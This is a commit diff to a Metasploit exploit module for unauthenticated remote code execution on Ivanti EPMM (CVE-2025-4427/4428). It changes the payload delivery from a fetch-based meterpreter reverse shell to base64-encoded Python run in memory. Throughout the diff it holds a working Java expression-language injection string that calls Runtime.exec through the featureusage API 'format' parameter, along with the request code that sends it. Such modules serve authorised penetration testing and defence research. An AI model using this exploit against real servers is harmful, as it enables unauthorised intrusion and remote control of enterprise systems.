Merge pull request rapid7#3 from bwatters-r7/collab/20265

remmons-r7 · web-flow · commit 6c8394ca0094 · 2025-06-03T13:47:19.000-05:00
Switch to in-memory python over fetch payloads
diff --git a/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb b/modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb
@@ -24,7 +24,8 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => [
           'CERT-EU', # Original discovery
-          'Sonny Macdonald & Piotr Bazydlo', # First published PoC
+          'Sonny Macdonald', # First Published PoC
+          'Piotr Bazydlo', # First published PoC
           'remmons-r7' # MSF Exploit
         ],
         'References' => [
@@ -40,17 +41,10 @@ def initialize(info = {})
         'DisclosureDate' => '2025-05-13',
         # Runs as the 'tomcat' user
         'Privileged' => false,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD],
+        'Platform' => ['python'],
+        'Arch' => [ARCH_PYTHON], # Tested appliance has Python 3.4.9
         'DefaultTarget' => 0,
         'Targets' => [ [ 'Default', {} ] ],
-        'DefaultOptions' => {
-          # cwd is not writable, so use /var/tmp, which is on an executable partition and can be written to
-          'FETCH_WRITABLE_DIR' => '/var/tmp',
-          # After updating Metasploit, the payload began defaulting to aarch64 for some reason
-          # Specifying x64 here to ensure a sane default
-          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
-        },
         'Notes' => {
           # Confirmed to work multiple times in a row and concurrently
           'Stability' => [CRASH_SAFE],
@@ -82,61 +76,25 @@ def check
     end
   end
 
-  def execute_command(cmd)
-    # Since the execution context only supports one command at a time, split on fetch payload semicolons
-    commands = cmd.split(';')
-    resp = nil
-
-    commands.each_with_index do |command, index|
-      command = command.strip
-      next if command.empty?
-
-      # An update to Metasploit in early 2025 changed the way that fetch payloads are constructed
-      # Previously, fetch payloads appended " &" to the execution command, but now only "&" is appended
-      # For example, "/var/tmp/EHDjrJnB &" -> "/var/tmp/EHDjrJnB&"
-      # The expression language execution context doesn't like it unless there's a space, so we add one
-      command = command.gsub('&', ' &')
-
-      vprint_status("Payload part #{index + 1}/#{commands.length}: #{command}")
+  def execute_command(command)
+    payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
 
-      # Non-blind payload reportedly being used in the wild, returns stdout in response body
-      payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
+    vprint_status("Sending template payload: #{payload}")
 
-      vprint_status("Sending template payload: #{payload}")
-
-      resp = send_request_cgi(
-        'method' => 'GET',
-        # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
-        'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
-        'vars_get' => {
-          'format' => payload
-        },
-        # Setting this timeout lower than the default, since the third request will not receive a response
-        # Per https://github.com/rapid7/metasploit-framework/issues/12004
-        'timeout' => 7.5
-      )
-
-      # The third fetch payload command (executing meterpreter) should hang and fail to respond
-      # If there's no response and it's not the third fetch payload, the exploit failed
-      if index != 2
-        unless resp
-          fail_with(Failure::Unknown, "Failed to execute command part #{index + 1}: #{command}")
-        end
-
-        vprint_status("Command part #{index + 1} response: #{resp.body}")
-
-      else
-        vprint_status('No command part 3 response expected')
-      end
-    end
-
-    resp
+    send_request_cgi(
+      'method' => 'GET',
+      # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
+      'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
+      'vars_get' => {
+        'format' => payload
+      }
+    )
   end
 
   def exploit
-    # We pass the encoded payload to execute_command
-    # That will split it up into three commands to execute, and it'll also handle error conditions
     vprint_status('Attempting to execute payload')
-    execute_command(payload.encoded)
+    base64_payload = Base64.urlsafe_encode64(payload.encoded)
+    cmd = "python3 -c exec(__import__(\"base64\").b64decode(\"#{base64_payload}\"))"
+    execute_command(cmd)
   end
 end
